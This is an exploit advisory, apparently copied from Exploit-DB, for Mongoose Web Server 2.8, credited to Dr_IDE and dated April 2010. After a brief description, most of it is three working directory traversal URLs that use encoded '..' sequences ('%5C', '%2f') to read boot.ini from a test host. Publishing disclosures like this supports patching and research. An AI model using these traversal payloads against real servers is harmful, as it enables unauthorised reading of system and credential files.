Mongoose Web Server 2.8 – Multiple Directory Traversals

  • 作者: Dr_IDE
    日期: 2010-04-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12309/
  • ################################################################
    #
    # Mongoose Web Server v2.8 Multiple Directory Traversal Exploits
    # Found By: Dr_IDE
    # Date: Apr. 20, 2010
    # Tested On:Windows 7
    # Download: http://code.google.com/p/mongoose/downloads/list
    #
    ################################################################
    
    - Description -
    
    Mongoose v2.8 is a Windows based HTTP server. This is the latest
    version of the application available.
    
    Mongoose v2.8 is vulnerable to manyremote directory traversal attacks.
    
    - Technical Details -
    http://172.16.2.102//..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
    http://172.16.2.102/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
    http://172.16.2.102/..%5C..%5Cboot.ini
    
    #[pocoftheday.blogspot.com]